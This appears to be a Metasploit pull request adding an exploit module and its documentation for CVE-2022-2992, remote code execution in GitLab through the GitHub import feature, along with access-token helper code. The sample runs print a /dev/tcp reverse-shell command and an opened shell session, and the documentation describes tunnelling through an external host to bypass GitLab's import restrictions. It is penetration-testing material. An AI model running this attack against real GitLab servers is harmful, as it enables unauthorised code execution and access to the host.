### PR TITLE
Added module for CVE-2022-2992 - Gitlab Remote Command Execution via Github import

### DIFF
--- a/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
+++ b/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
@@ -1,0 +1,191 @@
+## Vulnerable Application
+
+### Description
+
+An authenticated user can import a repository from Github into Gitlab.
+
+When importing a GitHub repository the Gitlab api client uses `Sawyer` for handling the responses. This takes a JSON hash and converts
+it into a Ruby class that has methods matching all of the keys. This happens recursively, and allows for any method to be overridden
+including built-in methods such as `to_s`.
+
+The redis gem uses `to_s` and `bytesize` to generate the RESP (Redis serialization protocol) command. By replying with a specially
+crafted JSON object (that will be further parsed as a `Sawyer::Resource`), one controlling the Github server can inject arbitrary
+redis commands to the stream.
+
+On August 30, 2022, Gitlab released a software update that addressed this vulnerability (CVE-2022-2992).
+
+The following products are affected:
+
+- From 11.10 to 15.1.6
+- From 15.2 to 15.2.4
+- From 15.3 to 15.3.2
+
+
+### Exploitation
+
+This module will abuse the authenticated Remote code execution on Gitlab through injecting a Ruby serialized object into the Redis as user
+session object that when the Gitlab call the Marshal.load when loading the cookie ` _gitlab_session` it will execute a deserialisation
+gadget and trigger the payload.
+
+To achieve that this module:
+- Will generate an universal Ruby deserialisation gadget payload;
+- Will create an access token for the user targeted;
+- Will start a server to emulate the Github and serve the payload to be injected;
+- Will create a group and also trigger the Github import feature to the repository from the controlled server
+- Will perform a request using the just injected session ID that when loaded must trigger the payload.
+
+After the execution the cleanup method will be called and:
+- Should delete the created group and consequently the repository
+- Should revoke the access token created
+- Should logout the user
+
+### Setup
+
+Create a `docker-compose.yml` file as below:
+
+```yml
+services:
+  gitlab:
+    image: 'gitlab/gitlab-ee:15.3.1-ee.0'
+    restart: always
+    container_name: gitlab
+    hostname: 'gitlab.example'
+    network_mode: "bridge"
+    ports:
+      - '880:80'
+      - '8443:443'
+    volumes:
+      - gitlab_config:/etc/gitlab
+      - gitlab_logs:/var/log/gitlab
+      - gitlab_data:/var/opt/gitlab
+volumes:
+  gitlab_config:
+    driver: local
+  gitlab_logs:
+    driver: local
+  gitlab_data:
+    driver: local
+```
+
+Run the below command to create the container:
+
+```
+$ docker-compose up
+```
+
+Wait for container to be "healthy" before continue. One can use [this](https://github.com/redwaysecurity/CVEs/blob/main/CVE-2022-2992/environment/healthy.sh) bash script to monitor the status.
+
+```
+$ # Creating personal access token for the root user
+$ TOKEN=`tr -dc A-Za-z0-9 </dev/urandom | head -c 24 ; echo ''`
+$ docker exec -e TOKEN=$TOKEN -it gitlab gitlab-rails runner "token = User.find_by_username('root').personal_access_tokens.create(scopes: [:sudo, :api], name: 'Automation token'); token.set_token(ENV['TOKEN']); token.save!"
+$ # Using the personal access token from the root user a user.
+$ USER=msf
+$ PASSWORD=SuperStrongestGitlabPassword
+$ curl --request POST --header "PRIVATE-TOKEN: $TOKEN" --data "skip_confirmation=true&email=$USER@gitlab.example&name=$USER&username=$USER&password=$PASSWORD" "http://gitlab.example:880/api/v4/users"
+```
+
+## Verification Steps
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+### TARGETURI (required)
+
+The path to the Gitlab (Default: `/`).
+
+### USERNAME (required)
+
+The username of the targed user to authenticate with.
+
+### PASSWORD (required)
+
+The password of the targed user to authenticate with.
+
+### NGROK_URL (required)
+
+The Ngrok tunnel url to be used. The Gitlab will perform requests to this address when trying to import the repository.
+
+Example how start the tunnel:
+```
+ngrok http 127.0.0.1:4567
+```
+
+### SRVHOST (required)
+
+The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+
+### SRVPORT (required)
+
+The local port to listen on. This is the port to be used when creating the tunnel.
+
+## Scenarios
+
+### Doker container running Gitlab 15.3.1
+
+```
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > options
+
+Module options (exploit/multi/http/gitlab_github_import_rce_cve_2022_2992):
+
+   Name       Current Setting                         Required  Description
+   ----       ---------------                         --------  -----------
+   NGROK_URL  https://f8f5-194-230-160-77.eu.ngrok.i  yes       The Ngrok tunnel url
+              o
+   PASSWORD   12345678                                yes       The password for the specified username
+   Proxies    http:172.25.144.1:8080                  no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.25.144.1                            yes       The target host(s), see https://github.com/rapid7/metasploit-framewor
+                                                                k/wiki/Using-Metasploit
+   RPORT      880                                     yes       The target port (TCP)
+   SRVHOST    0.0.0.0                                 yes       The local host or network interface to listen on. This must be an add
+                                                                ress on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    4567                                    yes       The local port to listen on.
+   SSL        false                                   no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                            no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                                       yes       The base path to the gitlab application
+   URIPATH                                            no        The URI to use for this exploit (default is random)
+   USERNAME   heyder                                  yes       The username to authenticate as
+   VHOST                                              no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting       Required  Description
+   ----   ---------------       --------  -----------
+   LHOST  host.docker.internal  yes       The listen address (an interface may be specified)
+   LPORT  4444                  yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > exploit
+
+[+] bash -c '0<&212-;exec 212<>/dev/tcp/host.docker.internal/4444;sh <&212 >&212 2>&212'
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) >
+[-] Handler failed to bind to 169.254.192.184:4444:-  -
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Using URL: http://host.docker.internal:4567/
+[*] Executing command: bash -c '0<&151-;exec 151<>/dev/tcp/host.docker.internal/4444;sh <&151 >&151 2>&151'
+[*] Session ID: lbid
+[*] Creating group KQPhsIKX
+[*] Importing a repository from github
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:58700) at 2022-11-19 15:23:06 +0100
+
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > sessions -1
+[*] Starting interaction with 1...
+
+id
+uid=998(git) gid=998(git) groups=998(git)
+pwd
+/var/opt/gitlab/gitlab-rails/working
+exit
+[*] Server stopped.
+[*] 172.25.144.1 - Command shell session 1 closed.
+```

--- a/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
+++ b/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
@@ -121,7 +121,7 @@ The local port to listen on. This is the port to be used when creating the tunne
 
 ## Scenarios
 
-### Doker container running Gitlab 15.3.1
+### Docker container running Gitlab 15.3.1
 
 ```
 msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > options

--- a/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
+++ b/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
@@ -2,17 +2,17 @@
 
 ### Description
 
-An authenticated user can import a repository from Github into Gitlab.
+An authenticated user can import a repository from GitHub into GitLab.
 
-When importing a GitHub repository the Gitlab api client uses `Sawyer` for handling the responses. This takes a JSON hash and converts
+When importing a GitHub repository the GitLab api client uses `Sawyer` for handling the responses. This takes a JSON hash and converts
 it into a Ruby class that has methods matching all of the keys. This happens recursively, and allows for any method to be overridden
 including built-in methods such as `to_s`.
 
 The redis gem uses `to_s` and `bytesize` to generate the RESP (Redis serialization protocol) command. By replying with a specially
-crafted JSON object (that will be further parsed as a `Sawyer::Resource`), one controlling the Github server can inject arbitrary
+crafted JSON object (that will be further parsed as a `Sawyer::Resource`), one controlling the GitHub server can inject arbitrary
 redis commands to the stream.
 
-On August 30, 2022, Gitlab released a software update that addressed this vulnerability (CVE-2022-2992).
+On August 30, 2022, GitLab released a software update that addressed this vulnerability (CVE-2022-2992).
 
 The following products are affected:
 
@@ -23,15 +23,15 @@ The following products are affected:
 
 ### Exploitation
 
-This module exploits the Gitlab vulnerability by injecting a Ruby serialized object into the Redis user
-session object. Once Gitlab calls the Marshal.load when loading the ` _gitlab_session` cookie, it will
+This module exploits the GitLab vulnerability by injecting a Ruby serialized object into the Redis user
+session object. Once GitLab calls the Marshal.load when loading the ` _gitlab_session` cookie, it will
 execute a deserialisation gadget and trigger the payload.
 
 To achieve that this module:
 - Will generate an universal Ruby deserialisation gadget payload;
 - Will create an access token for the user targeted;
-- Will start a server to emulate the Github and serve the payload to be injected;
-- Will create a group and also trigger the Github import feature to the repository from the controlled server
+- Will start a server to emulate GitHub and serve the payload to be injected;
+- Will create a group and also trigger the GitHub import feature to the repository from the controlled server
 - Will perform a request using the just injected session ID that when loaded must trigger the payload.
 
 After the execution the cleanup method will be called and:
@@ -81,7 +81,7 @@ $ TOKEN=`tr -dc A-Za-z0-9 </dev/urandom | head -c 24 ; echo ''`
 $ docker exec -e TOKEN=$TOKEN -it gitlab gitlab-rails runner "token = User.find_by_username('root').personal_access_tokens.create(scopes: [:sudo, :api], name: 'Automation token'); token.set_token(ENV['TOKEN']); token.save!"
 $ # Using the personal access token from the root user a user.
 $ USER=msf
-$ PASSWORD=SuperStrongestGitlabPassword
+$ PASSWORD=SuperStrongestGitLabPassword
 $ curl --request POST --header "PRIVATE-TOKEN: $TOKEN" --data "skip_confirmation=true&email=$USER@gitlab.example&name=$USER&username=$USER&password=$PASSWORD" "http://gitlab.example:880/api/v4/users"
 ```
 
@@ -92,7 +92,7 @@ Follow [Setup](#setup) and [Scenarios](#scenarios).
 
 ### TARGETURI (required)
 
-The path to the Gitlab (Default: `/`).
+The path to the GitLab (Default: `/`).
 
 ### USERNAME (required)
 
@@ -104,7 +104,7 @@ The password of the target user to authenticate with.
 
 ### NGROK_URL (required)
 
-The Ngrok tunnel url to be used. The Gitlab will perform requests to this address when trying to import the repository.
+The Ngrok tunnel url to be used. The GitLab will perform requests to this address when trying to import the repository.
 
 Example how start the tunnel:
 ```
@@ -121,7 +121,7 @@ The local port to listen on. This is the port to be used when creating the tunne
 
 ## Scenarios
 
-### Docker container running Gitlab 15.3.1
+### Docker container running GitLab 15.3.1
 
 ```
 msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > options

--- a/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
+++ b/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
@@ -23,9 +23,8 @@ The following products are affected:
 
 ### Exploitation
 
-This module will abuse the authenticated Remote code execution on Gitlab through injecting a Ruby serialized object into the Redis as user
-session object that when the Gitlab call the Marshal.load when loading the cookie ` _gitlab_session` it will execute a deserialisation
-gadget and trigger the payload.
+This module exploits the Gitlab vulnerability by injecting a Ruby serialized object into the Redis user
+session object. Once Gitlab calls the Marshal.load when loading the ` _gitlab_session` cookie, it will execute a deserialisation gadget and trigger the payload.
 
 To achieve that this module:
 - Will generate an universal Ruby deserialisation gadget payload;
@@ -96,11 +95,11 @@ The path to the Gitlab (Default: `/`).
 
 ### USERNAME (required)
 
-The username of the targed user to authenticate with.
+The username of the target user to authenticate with.
 
 ### PASSWORD (required)
 
-The password of the targed user to authenticate with.
+The password of the target user to authenticate with.
 
 ### NGROK_URL (required)
 

--- a/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
+++ b/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
@@ -25,10 +25,10 @@ The following products are affected:
 
 This module exploits the GitLab vulnerability by injecting a Ruby serialized object into the Redis user
 session object. Once GitLab calls the Marshal.load when loading the ` _gitlab_session` cookie, it will
-execute a deserialisation gadget and trigger the payload.
+execute a deserialization gadget and trigger the payload.
 
 To achieve that this module:
-- Will generate an universal Ruby deserialisation gadget payload;
+- Will generate an universal Ruby deserialization gadget payload;
 - Will create an access token for the user targeted;
 - Will start a server to emulate GitHub and serve the payload to be injected;
 - Will create a group and also trigger the GitHub import feature to the repository from the controlled server
@@ -102,15 +102,6 @@ The username of the target user to authenticate with.
 
 The password of the target user to authenticate with.
 
-### NGROK_URL (required)
-
-The Ngrok tunnel url to be used. The GitLab will perform requests to this address when trying to import the repository.
-
-Example how start the tunnel:
-```
-ngrok http 127.0.0.1:4567
-```
-
 ### SRVHOST (required)
 
 The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
@@ -119,41 +110,66 @@ The local host or network interface to listen on. This must be an address on the
 
 The local port to listen on. This is the port to be used when creating the tunnel.
 
+### URIHOST
+
+Host to use in GitHub import URL. On default GitLab instances, this must be either a public (non-RFC1918) IP address or
+a hostname that resolves to a public IP address. This option can be used in conjunction with a reverse port-forwarding
+service such as SSH or NGROK. **The target GitLab server will connect to this host and eventually receive the payload
+through it, so it is important to use a host that is considered to be trustworthy.**
+
 ## Scenarios
 
 ### Docker container running GitLab 15.3.1
+
+The following example uses the following three hosts:
+
+* 192.168.159.128 -- The target GitLab server
+* 192.168.250.134 -- The host on which Metasploit is running
+* ext.msflab.local -- An external host on the internet through which the HTTP requests from GitLab to Metasploit are
+  tunneled in order to bypass GitLab restrictions.
+
+External to Metasploit, SSH is used to setup a reverse port forward through a host with a public (non-RFC1918) IP
+address. This is necessary to bypass Import URL restrictions that are in place by default on GitLab. The port-forward
+was configured with `ssh -R 8088:localhost:8088 ext.msflab.local` to forward TCP port 8088 on ext.msflab.local to the
+local Metasploit instance. Alternatively, this step could be skipped if Metasploit were running on a host with public IP
+address.
+
+If the target GitLab server can not import from the specified URL (for example because the host is a private IP
+address), then the module will throw this error:
+
+```
+[-] Exploit failed: Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError Invalid URL: http://192.168.250.134:8088/
+```
 
 ```
 msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > options
 
 Module options (exploit/multi/http/gitlab_github_import_rce_cve_2022_2992):
 
-   Name       Current Setting                         Required  Description
-   ----       ---------------                         --------  -----------
-   NGROK_URL  https://f8f5-194-230-160-77.eu.ngrok.i  yes       The Ngrok tunnel url
-              o
-   PASSWORD   12345678                                yes       The password for the specified username
-   Proxies    http:172.25.144.1:8080                  no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     172.25.144.1                            yes       The target host(s), see https://github.com/rapid7/metasploit-framewor
-                                                                k/wiki/Using-Metasploit
-   RPORT      880                                     yes       The target port (TCP)
-   SRVHOST    0.0.0.0                                 yes       The local host or network interface to listen on. This must be an add
-                                                                ress on the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT    4567                                    yes       The local port to listen on.
-   SSL        false                                   no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                                            no        Path to a custom SSL certificate (default is randomly generated)
-   TARGETURI  /                                       yes       The base path to the gitlab application
-   URIPATH                                            no        The URI to use for this exploit (default is random)
-   USERNAME   heyder                                  yes       The username to authenticate as
-   VHOST                                              no        HTTP server virtual host
+   Name          Current Setting          Required  Description
+   ----          ---------------          --------  -----------
+   IMPORT_DELAY  5                        yes       Time to wait from the import task before try to trigger the payload
+   PASSWORD      Password1!               yes       The password for the specified username
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.159.128          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         880                      yes       The target port (TCP)
+   SRVHOST       0.0.0.0                  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8088                     yes       The local port to listen on.
+   SSL           false                    no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI     /                        yes       The base path to the gitlab application
+   URIHOST       ext.msflab.local         no        Host to use in GitHub import URL
+   URIPATH                                no        The URI to use for this exploit (default is random)
+   USERNAME      smcintyre                yes       The username to authenticate as
+   VHOST                                  no        HTTP server virtual host
 
 
 Payload options (cmd/unix/reverse_bash):
 
-   Name   Current Setting       Required  Description
-   ----   ---------------       --------  -----------
-   LHOST  host.docker.internal  yes       The listen address (an interface may be specified)
-   LPORT  4444                  yes       The listen port
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
 
 
 Exploit target:
@@ -162,30 +178,24 @@ Exploit target:
    --  ----
    0   Unix Command
 
-msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > exploit
 
-[+] bash -c '0<&212-;exec 212<>/dev/tcp/host.docker.internal/4444;sh <&212 >&212 2>&212'
-[*] Exploit running as background job 0.
-[*] Exploit completed, but no session was created.
-msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) >
-[-] Handler failed to bind to 169.254.192.184:4444:-  -
-[*] Started reverse TCP handler on 0.0.0.0:4444
-[!] AutoCheck is disabled, proceeding with exploitation
-[*] Using URL: http://host.docker.internal:4567/
-[*] Executing command: bash -c '0<&151-;exec 151<>/dev/tcp/host.docker.internal/4444;sh <&151 >&151 2>&151'
-[*] Session ID: lbid
-[*] Creating group KQPhsIKX
-[*] Importing a repository from github
-[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:58700) at 2022-11-19 15:23:06 +0100
 
-msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > sessions -1
-[*] Starting interaction with 1...
+View the full module info with the info, or info -d command.
 
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > run
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected GitLab version 15.3.1 which is vulnerable.
+[*] Using URL: http://ext.msflab.local:8088/
+[*] Command shell session 1 opened (192.168.250.134:4444 -> 192.168.250.134:56794) at 2023-02-13 13:41:05 -0500
 id
+[*] Server stopped.
+
 uid=998(git) gid=998(git) groups=998(git)
 pwd
 /var/opt/gitlab/gitlab-rails/working
 exit
-[*] Server stopped.
-[*] 172.25.144.1 - Command shell session 1 closed.
+[*] 192.168.159.128 - Command shell session 1 closed.
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) >
 ```

--- a/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
+++ b/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
@@ -24,7 +24,8 @@ The following products are affected:
 ### Exploitation
 
 This module exploits the Gitlab vulnerability by injecting a Ruby serialized object into the Redis user
-session object. Once Gitlab calls the Marshal.load when loading the ` _gitlab_session` cookie, it will execute a deserialisation gadget and trigger the payload.
+session object. Once Gitlab calls the Marshal.load when loading the ` _gitlab_session` cookie, it will
+execute a deserialisation gadget and trigger the payload.
 
 To achieve that this module:
 - Will generate an universal Ruby deserialisation gadget payload;

--- a/lib/msf/core/exploit/remote/http/gitlab.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab.rb
@@ -8,11 +8,13 @@ module Msf
         module Gitlab
           include Msf::Exploit::Remote::HttpClient
           include Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
+          include Msf::Exploit::Remote::HTTP::Gitlab::Authenticate
           include Msf::Exploit::Remote::HTTP::Gitlab::Error
+          include Msf::Exploit::Remote::HTTP::Gitlab::Form
           include Msf::Exploit::Remote::HTTP::Gitlab::Groups
           include Msf::Exploit::Remote::HTTP::Gitlab::Helpers
           include Msf::Exploit::Remote::HTTP::Gitlab::Import
-          include Msf::Exploit::Remote::HTTP::Gitlab::Signin
+          include Msf::Exploit::Remote::HTTP::Gitlab::Rest
           include Msf::Exploit::Remote::HTTP::Gitlab::Version
 
           def initialize(info = {})

--- a/lib/msf/core/exploit/remote/http/gitlab.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab.rb
@@ -23,12 +23,6 @@ module Msf
                 Msf::OptString.new('TARGETURI', [true, 'The base path to the gitlab application', '/'])
               ], Msf::Exploit::Remote::HTTP::Gitlab
             )
-
-            register_advanced_options(
-              [
-                Msf::OptBool.new('GITLABCHECK', [true, 'Check if the website is a valid Gitlab install', true]),
-              ], Msf::Exploit::Remote::HTTP::Gitlab
-            )
           end
 
           # class GitLabClientException < StandardError; end

--- a/lib/msf/core/exploit/remote/http/gitlab.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab.rb
@@ -8,12 +8,12 @@ module Msf
         module Gitlab
           include Msf::Exploit::Remote::HttpClient
           include Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
+          include Msf::Exploit::Remote::HTTP::Gitlab::Error
           include Msf::Exploit::Remote::HTTP::Gitlab::Groups
           include Msf::Exploit::Remote::HTTP::Gitlab::Helpers
           include Msf::Exploit::Remote::HTTP::Gitlab::Import
           include Msf::Exploit::Remote::HTTP::Gitlab::Signin
           include Msf::Exploit::Remote::HTTP::Gitlab::Version
-          # include Msf::Exploit::Remote::HTTP::Gitlab::Api
 
           def initialize(info = {})
             super
@@ -24,15 +24,14 @@ module Msf
               ], Msf::Exploit::Remote::HTTP::Gitlab
             )
 
-            # register_advanced_options(
-            #   [
-            #     Msf::OptString.new('WPCONTENTDIR', [true, 'The name of the wp-content directory', 'wp-content']),
-            #     Msf::OptBool.new('WPCHECK', [true, 'Check if the website is a valid WordPress install', true]),
-            #   ], Msf::Exploit::Remote::HTTP::Gitlab
-            # )
+            register_advanced_options(
+              [
+                Msf::OptBool.new('GITLABCHECK', [true, 'Check if the website is a valid Gitlab install', true]),
+              ], Msf::Exploit::Remote::HTTP::Gitlab
+            )
           end
 
-          class GitLabClientException < StandardError; end
+          # class GitLabClientException < StandardError; end
         end
       end
     end

--- a/lib/msf/core/exploit/remote/http/gitlab.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab.rb
@@ -1,0 +1,40 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        # This module provides a way of interacting with gitlab installations
+        module Gitlab
+          include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
+          include Msf::Exploit::Remote::HTTP::Gitlab::Groups
+          include Msf::Exploit::Remote::HTTP::Gitlab::Helpers
+          include Msf::Exploit::Remote::HTTP::Gitlab::Import
+          include Msf::Exploit::Remote::HTTP::Gitlab::Signin
+          include Msf::Exploit::Remote::HTTP::Gitlab::Version
+          # include Msf::Exploit::Remote::HTTP::Gitlab::Api
+
+          def initialize(info = {})
+            super
+
+            register_options(
+              [
+                Msf::OptString.new('TARGETURI', [true, 'The base path to the gitlab application', '/'])
+              ], Msf::Exploit::Remote::HTTP::Gitlab
+            )
+
+            # register_advanced_options(
+            #   [
+            #     Msf::OptString.new('WPCONTENTDIR', [true, 'The name of the wp-content directory', 'wp-content']),
+            #     Msf::OptBool.new('WPCHECK', [true, 'Check if the website is a valid WordPress install', true]),
+            #   ], Msf::Exploit::Remote::HTTP::Gitlab
+            # )
+          end
+
+          class GitLabClientException < StandardError; end
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
@@ -21,11 +21,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
       }
     })
 
-    if res.nil? || res.body.nil?
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
-    elsif res.code != 200
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
-    end
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, 'Failed to create access token' unless res&.code == 200
 
     token = JSON.parse(res.body)['new_token']
 
@@ -36,7 +32,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
 
   # Revoke Gitlab personal access token
   #
-  # @return [nil,GitLabClientException] nil if revoke, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException otherwise
+  # @return [nil,GitLabClientError] nil if revoke, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientError otherwise
   def gitlab_revoke_access_token(api_token)
     res = send_request_cgi({
       'method' => 'DELETE',
@@ -47,11 +43,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
       }
     })
 
-    if res.nil? || res.body.nil?
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
-    elsif res.code != 204
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
-    end
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, 'Failed to revoke access token' unless res&.code == 204
 
     nil
   end

--- a/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
@@ -5,7 +5,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
   # Create Gitlab access access token
   #
   # @return [String,nil] Gitlab personal access token if created, nil otherwise
-  def gitlab_create_access_token
+  def gitlab_create_personal_access_token
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/-/profile/personal_access_tokens'),
@@ -33,7 +33,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
   # Revoke Gitlab personal access token
   #
   # @return [nil,GitLabClientError] nil if revoke, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientError otherwise
-  def gitlab_revoke_access_token(api_token)
+  def gitlab_revoke_personal_access_token(personal_access_token)
     res = send_request_cgi({
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, '/api/v4/personal_access_tokens/self'),

--- a/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
@@ -2,53 +2,6 @@
 
 # GitLab Access Tokens mixin
 module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
-  # Create Gitlab access access token
-  #
-  # @return [String,nil] Gitlab personal access token if created, nil otherwise
-  def gitlab_create_personal_access_token
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '/-/profile/personal_access_tokens'),
-      'keep_cookies' => true,
-      'vars_post' => {
-        'personal_access_token[name]' => Rex::Text.rand_text_alphanumeric(8),
-        'personal_access_token[expires_at]' => '',
-        'personal_access_token[scopes][]' => 'api',
-        'commit' => 'Create personal access token'
-      },
-      'headers' => {
-        'X-CSRF-Token' => gitlab_helper_extract_csrf_token(path: '/-/profile/personal_access_tokens', regex: /name="csrf-token" content="(.*)"/)
-      }
-    })
-
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
-
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, "Failed to create access token. Unexpected HTTP #{res.code} response." unless res.code == 200
-
-    token = JSON.parse(res.body)['new_token']
-
-    return token if token
-
-    nil
-  end
-
-  # Revoke Gitlab personal access token
-  #
-  # @return [nil,GitLabClientError] nil if revoke, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientError otherwise
-  def gitlab_revoke_personal_access_token(personal_access_token)
-    res = send_request_cgi({
-      'method' => 'DELETE',
-      'uri' => normalize_uri(target_uri.path, '/api/v4/personal_access_tokens/self'),
-      'ctype' => 'application/json',
-      'headers' => {
-        'PRIVATE-TOKEN' => personal_access_token
-      }
-    })
-
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
-
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, "Failed to revoke access token.  Unexpected HTTP #{res.code} response." unless res.code == 204
-
-    nil
-  end
+  include Msf::Exploit::Remote::HTTP::Gitlab::Form::AccessTokens
+  include Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::AccessTokens
 end

--- a/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
@@ -8,7 +8,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
   def gitlab_create_access_token
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => '/-/profile/personal_access_tokens',
+      'uri' => normalize_uri(target_uri.path, '/-/profile/personal_access_tokens'),
       'keep_cookies' => true,
       'vars_post' => {
         'personal_access_token[name]' => Rex::Text.rand_text_alphanumeric(8),
@@ -36,7 +36,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
   def gitlab_revoke_access_token(api_token)
     res = send_request_cgi({
       'method' => 'DELETE',
-      'uri' => '/api/v4/personal_access_tokens/self',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/personal_access_tokens/self'),
       'ctype' => 'application/json',
       'headers' => {
         'PRIVATE-TOKEN' => api_token

--- a/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
@@ -21,7 +21,9 @@ module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
       }
     })
 
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, 'Failed to create access token' unless res&.code == 200
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, "Failed to create access token. Unexpected HTTP #{res.code} response." unless res.code == 200
 
     token = JSON.parse(res.body)['new_token']
 
@@ -39,11 +41,13 @@ module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
       'uri' => normalize_uri(target_uri.path, '/api/v4/personal_access_tokens/self'),
